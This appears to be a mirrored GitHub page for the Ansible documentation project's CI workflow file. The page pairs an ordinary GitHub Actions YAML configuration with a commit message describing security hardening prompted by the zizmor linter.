mirror of
https://github.com/ansible/ansible-documentation.git
synced 2026-03-27 13:28:51 +07:00
86f9d4351e
* ci: fix issues indentified by zizmor GHA linter This fixes issues identified by the zizmor linter which checks for Github Actions security best practicies. Summary of changes: - Remove possibilities for shell injection. These can all only be activated by workflow_dispatch input provided by people who already have access to the repository but still a good idea to tidy this up. Many of these occur in the build-package-docs actions. We should test everything to make sure nothing is broken by these changes. - Explicitly set permissions. This is not strictly required, because we already enforce a limited set of default permissions in the repo's GHA settings, but zizmor wants us to be explicit. - Use `persist-credentials: false` with the checkout action. Also, when rebasing this commit, I added back the manual `nox -s clone-core` step to keep the outputs separate. * ci: run zizmor in CI and noxfile - Adds lockfile - Adds nox session - Adds nox session to CI matrix * ci: fix additional issues identified by zizmor - Add default permissions to new workflows - Add cooldown to dependabot * ci: add zizmor configuration for unpinned-uses We could configure dependabot to pin shared workflow commit SHA hashes, but for now, let's relax the unpinned-uses relax * ci: restore secrets: inheirt for pip-compile workflows See comment for more details. * ci: fix token auth for pip-compile workflow * README: mention that lint session runs GHA checks * Update noxfile.py Co-authored-by: Don Naro <dnaro@redhat.com> * nox zizmor: allow overriding persona * nox: actually run zizmor as part of lint session * ci: use GHA expression instead of shell test Co-authored-by: 🇺🇦 Sviatoslav Sydorenko (Святослав Сидоренко) <wk@sydorenko.org.ua> * ci: use Python to avoid shell+json quoting issues --------- Co-authored-by: Don Naro <dnaro@redhat.com> Co-authored-by: 🇺🇦 Sviatoslav Sydorenko (Святослав Сидоренко) <wk@sydorenko.org.ua>
39 lines
698 B
YAML
39 lines
698 B
YAML
name: Ansible Docsite CI
|
|
|
|
"on":
|
|
schedule:
|
|
# Daily
|
|
- cron: "23 7 * * *"
|
|
push:
|
|
branches-ignore:
|
|
- 'patchback/**'
|
|
- 'pip-compile/**'
|
|
pull_request:
|
|
types:
|
|
- opened # default
|
|
- synchronize # default
|
|
- reopened # default
|
|
- ready_for_review # used in PRs created from GitHub Actions workflows
|
|
workflow_dispatch:
|
|
|
|
permissions:
|
|
contents: read
|
|
|
|
jobs:
|
|
nox:
|
|
uses: ./.github/workflows/reusable-nox.yml
|
|
|
|
check:
|
|
if: always()
|
|
|
|
needs:
|
|
- nox
|
|
|
|
runs-on: ubuntu-latest
|
|
|
|
steps:
|
|
- name: Decide whether the needed jobs succeeded or failed
|
|
uses: re-actors/alls-green@release/v1
|
|
with:
|
|
jobs: ${{ toJSON(needs) }}
|